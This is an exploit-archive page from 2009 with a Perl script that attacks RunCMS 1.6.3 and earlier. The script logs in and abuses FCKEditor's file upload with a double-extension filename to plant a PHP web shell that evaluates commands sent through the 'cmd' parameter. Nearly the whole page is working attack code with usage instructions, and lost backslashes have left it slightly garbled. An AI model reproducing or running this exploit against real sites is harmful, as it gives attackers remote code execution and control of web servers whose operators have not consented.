[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : RunCMS <= 1.6.3 (double ext) Remote Shell Injection Exploit
# Published : 2009-07-13
# Author : StAkeR
# Previous Title : Traidnt UP 2.0 Remote Blind SQL Injection Exploit
# Next Title : Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability


#!/usr/bin/perl

# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                           
# RunCMS <= 1.6.3 "double ext" remote shell injection exploit #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #                                                            
#                                                             #
# Note: you may upload files with double extension            #
#       FCKEditor must be enabled for users                   #
#                                                             #                                         
#                                                             #
# by staker                                                   #
# ------------------------------                              #
# mail: staker[at]hotmail[dot]it                              #
# url: http://www.runcms.org                                  #
# ------------------------------                              #
# Discovered on 15 June 2009                                  #
# Happy Birthday Irene                                        #
# ----------------------------------------------------------- #


use IO::Socket;
use LWP::UserAgent;


cronx_us();

my ($host,$path,$username) = @ARGV;
my $password = $ARGV[3] || exit;
my $filename = "snippet.jpg.pwl"; # change it this is just an example

shell_up();

sub cronx_us() {
        
        print "[*------------------------------------------------------------*]n".
              "[* RunCMS <= 1.6.3 (fckeditor) remote shell injection exploit *]n".
              "[*------------------------------------------------------------*]n". 
              "[* Usage: perl web.pl [host] [path] [user] [pass]             *]n".
              "[*                                                            *]n".
              "[* Options:                                                   *]n".
              "[* [host] insert a valid host                                 *]n".
              "[* [path] insert a valid RunCMS path                          *]n".
              "[* [user] your username                                       *]n".
              "[* [pass] your password                                       *]n".
              "[*------------------------------------------------------------*]n";
}

sub login() {    
    
    my $LWP = new LWP::UserAgent;
    
    my $post = $LWP->post(http_url($host)."/$path/user.php",
                         [ uname => $username,
                           pass  => $password,
                           op    => 'login', 
                         ]) || die $!;

    if ($post->as_string =~ /Set-Cookie: (.*)/i) {
        return $1;
    }
}

sub http_url() {
    
    my $string = shift @_ || die($!);
        
    if ($string !~ /^http://?/i) {
       return 'http://'.$string;
    }  
}


sub shell_up() { 
    
     my ($data,$packet,$result);
     my $cookie = login();


     my $vector = chr(45) x27;
     my $socket = new IO::Socket::INET(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp',
                                     ) or die $!;
        
       
     $data .= $vector."--uploadingrn";
     $data .= "Content-Disposition: form-data; name="NewFile"; filename="$filename"rn";
     $data .= "Content-Type: unknown/unknownrnrn";
     $data .= "<?php error_reporting(E_ALL); if(isset($_GET['cmd'])){die(eval(stripslashes($_GET['cmd'])));} ?>rn";
     $data .= $vector."--uploading--rn";

     $packet .= "POST $path/class/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0rn";
     $packet .= "Content-Type: multipart/form-data; boundary=".$vector."uploadingrn";
     $packet .= "Host: $hostrn";
     $packet .= "Cookie: $cookiern";
     $packet .= "User-Agent :Lynx (textmode)rn";
     $packet .= "Content-Length: ".length($data)."rn";
     $packet .= "Connection: Closernrn";
     $packet .= $data;

     $socket->send($packet);

     foreach $result (<$socket>) { 
          
          if ($result =~ /file uploader is disabled/i) {
             die("No access for you..n");
          }
          else {   
              print $result;
          }    
     }                
}


__END__

# www.Syue.com [2009-07-13]